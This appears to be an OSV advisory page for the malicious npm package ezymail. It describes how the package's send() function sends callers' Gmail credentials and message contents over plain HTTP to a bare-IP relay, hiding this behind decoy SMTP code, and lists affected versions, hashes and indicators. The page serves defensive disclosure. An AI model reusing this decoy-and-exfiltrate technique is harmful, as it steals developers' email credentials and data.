MAL-2026-4557

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ezymail/MAL-2026-4557.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4557

Published

2026-05-20T02:05:58Z

Modified

2026-05-26T06:02:31.379516767Z

Summary

Malicious code in ezymail (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (ea463f516048086ec4acfc2733edc9561dac749d19c2e47381fc170c451cd53c)

The package advertises itself as a Gmail/SMTP sender library. The README documents that callers pass their SMTP user and pass (Gmail App Password) to a send() function that talks SMTP/TLS directly to the user's mail server. In reality, index.js (the package main) does not use the bundled lib/mailer.js SMTP implementation at all. Instead, send() spreads the caller-supplied data (including user, pass, from, to, subject, and body) into a JSON payload and POSTs it to http://54.90.254.81:3000/send over cleartext HTTP (index.js lines 7-22). lib/mailer.js exists as decoy code matching the README's 'How It Works' section but is only imported by server.js, the attacker's relay server, never by the package main. Every consumer following the documented usage hands their Gmail address and App Password — plus all recipient addresses and message content — to a bare-IP endpoint over plaintext HTTP on first call to the package's advertised API.

Database specific

{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-05-20T02:40:01Z",
            "versions": [
                "2.0.2"
            ],
            "sha256": "68368df4bdb4b3db2be822a508ff596ca7af0f74c0cbf9e8137426a66933900e",
            "id": "IN-MAL-2026-003429",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:37.543316798Z"
        },
        {
            "import_time": "2026-05-26T05:51:20.842940988Z",
            "versions": [
                "2.0.8"
            ],
            "sha256": "73ac73ac3571e19c5124da7423f66b9de2d99956ea07518b430d0a6393716424",
            "id": "IN-MAL-2026-003804",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T12:27:01Z"
        },
        {
            "modified_time": "2026-05-20T02:05:58Z",
            "versions": [
                "2.0.6"
            ],
            "sha256": "a10e677af3dda40bc569ecdac08d36a73fc29fbdf1ba170538076a83cbab263e",
            "id": "IN-MAL-2026-003391",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:33.179096491Z"
        },
        {
            "import_time": "2026-05-26T05:50:38.969613583Z",
            "versions": [
                "2.0.4"
            ],
            "sha256": "daae0def10869ec69e0029757598c30dd99b3f27a2e38b5e84fc356a55de8dd8",
            "id": "IN-MAL-2026-003441",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T02:57:13Z"
        },
        {
            "modified_time": "2026-05-20T02:39:11Z",
            "versions": [
                "2.0.5"
            ],
            "sha256": "ea463f516048086ec4acfc2733edc9561dac749d19c2e47381fc170c451cd53c",
            "id": "IN-MAL-2026-003428",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:50:37.435057222Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / ezymail

Package

Name: ezymail; View open source insights on deps.dev
Purl: pkg:npm/ezymail

Affected ranges

Affected versions

2.*

2.0.2

2.0.4

2.0.5

2.0.6

2.0.8

Database specific

indicators

{
    "evidence_files": [
        {
            "sha256": "6fabbe628e089526a9429dec39a88d07626346dd76a4ad3d1fc932cc6c283db9",
            "tlsh": "10f050e6905256830f35e676f7d6b905f754623f74008803bbbc41491ff16145151dcc",
            "path": "index.js"
        }
    ],
    "package_integrity": [
        {
            "filename": "ezymail-2.0.2.tgz",
            "hashes": {
                "sha512_sri": "sha512-jn3rOJmZieko/ryT0CUXHuL0t+6SgN16j0Qg5nu34avqbFm7K1NsKTWgUZ8tqwOQx54sMgUwp1nYRIDzIuro+g==",
                "sha1": "f30ec9b8eb8166d00b5d5cb41b5577e8d8428133"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ezymail/MAL-2026-4557.json"

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]